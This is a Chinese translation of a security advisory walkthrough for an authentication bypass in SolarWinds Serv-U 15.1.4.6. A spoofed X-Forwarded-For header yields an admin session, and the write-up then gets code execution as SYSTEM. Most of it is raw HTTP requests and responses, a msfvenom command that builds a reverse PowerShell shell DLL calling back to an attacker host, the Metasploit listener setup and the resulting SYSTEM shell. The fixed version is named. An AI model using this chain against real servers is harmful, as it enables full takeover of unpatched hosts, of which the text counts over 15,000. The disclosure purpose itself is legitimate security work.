本文主要介绍Solarwinds的文件共享程序Serv-U中的一个新漏洞,该漏洞可以让攻击者获取Serv-U管理权限,且允许在system用户账户权限下执行代码。
在windows 7虚拟机上安装Serv-U试用版进行测试。
正常安装Serv-U,利用该漏洞不需要进行任何配置更改。
为了识别漏洞,使用Burp Suite的Spider功能,发现/?Command = Login页面。 使用Burp Suite的扫描器进行fuzz测试,可以修改X-Forwarded-For HTTP头识别出不同的响应。 经过测试,在提交“登录请求”(不带POST参数)时, X-Forwarded-For标头设置为127.0.0.1 ,Serv-U应用程序返回一个有效的本地管理员帐户会话 cookie。
POST /?Command=Login HTTP/1.1 Host: 127.0.0.1:43958 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close X-Forwarded-For: 127.0.0.1 HTTP/1.0 200 OK Server: Serv-U/15.1.4.6 Date: Mon, 30 Jan 2017 16:47:40 GMT Accept-Encoding: deflate Connection: close X-Frame-Options: sameorigin X-Same-Domain: 1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Type: text/html Pragma: no-cache Cache-Control: no-cache,no-store,max-age=0,must-revalidate Expires: -1 Set-Cookie: Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; path=/; httponly; Set-Cookie: CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C; path=/; httponly; Set-Cookie: SULang=en Content-Length: 66844 ...TRUNCATED...
在火狐浏览器提交此请求后,返回报错信息。
但是,应用程序返回的本地管理员会话cookie是有效的。
GET / HTTP/1.1 Host: 127.0.0.1:43958 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: SULang=en%2CUS; killmenothing; Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.0 200 OK Server: Serv-U/15.1.4.6 Date: Mon, 30 Jan 2017 16:48:52 GMT Accept-Encoding: deflate Connection: close X-Frame-Options: sameorigin X-Same-Domain: 1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Type: text/html Pragma: no-cache Cache-Control: no-cache,no-store,max-age=0,must-revalidate Expires: -1 Set-Cookie: Session=_78933e21bd7d9f5a64fe82a8029cce5c6a7cda5f1fbf886d74afcb5b36eabf0fe29351b5fa8a8f66b6884d4dc3cb47748f5c30dd378a14690754581406246bf8; path=/; httponly; Set-Cookie: CsrfToken=D9F1F03FE9F7E8E7D0BE2DEF2ECAED7C; path=/; httponly; Set-Cookie: SULang=en,US Content-Length: 66844 ...TRUNCATED... sLoggedInUser="(Local Admin)";sLoggedInUserAlt="Local Admin"; ...TRUNCATED...
现在攻击者具有对Serv-U应用程序的管理权限,攻击者可以上传并执行任意DLL。
接下来,创建一个DLL,生成一个带有192.168.1.101:8443的反向PowerShell shell,并验证它是否会被目标的防病毒软件拦截。
root@6c656f:~# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.101 LPORT=8443 -f dll > MFC100PWN.dll No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 1810 bytes Final size of dll file: 5120 bytes root@6c656f:~# file MFC100PWN.dll MFC100PWN.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
配置侦听器以捕获192.168.1.101:8443上的反向shell。
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/x64/powershell_reverse_tcp PAYLOAD => windows/x64/powershell_reverse_tcp msf exploit(handler) > set LHOST 192.168.1.101 LHOST => 144.217.164.221 msf exploit(handler) > set LPORT 8443 LPORT => 8443 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse SSL handler on 192.168.1.101:8443 [*] Starting the payload handler... msf exploit(handler) >
利用Serv-U Web Client将恶意DLL上传到“C:\Program Files\RhinoSoft\Serv-U”。
执行上传的DLL。
DLL被执行,攻击者收到一个SYSTEM shell。
msf exploit(handler) > [*] Powershell session session 1 opened (192.168.1.101:8443 -> xxx.xxx.xxx.xxx:52069) at 2017-01-30 12:07:05 -0500 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... Windows PowerShell running as user xxxx-xx-xxxx$ on xxxx-xx-xxxx Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Program Files\RhinoSoft\Serv-U>whoami nt authority\system
截至2017年1月30日,在Shodan检索到的应用该程序的公共服务器超过15,000台。
修复方法:更新到Serv-U FTP / MFT Server 15.1.5版本
有关更多信息,请参阅链接:https//www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-008/?fid=9155
*本文由漏洞银行(BUGBANK.cn)译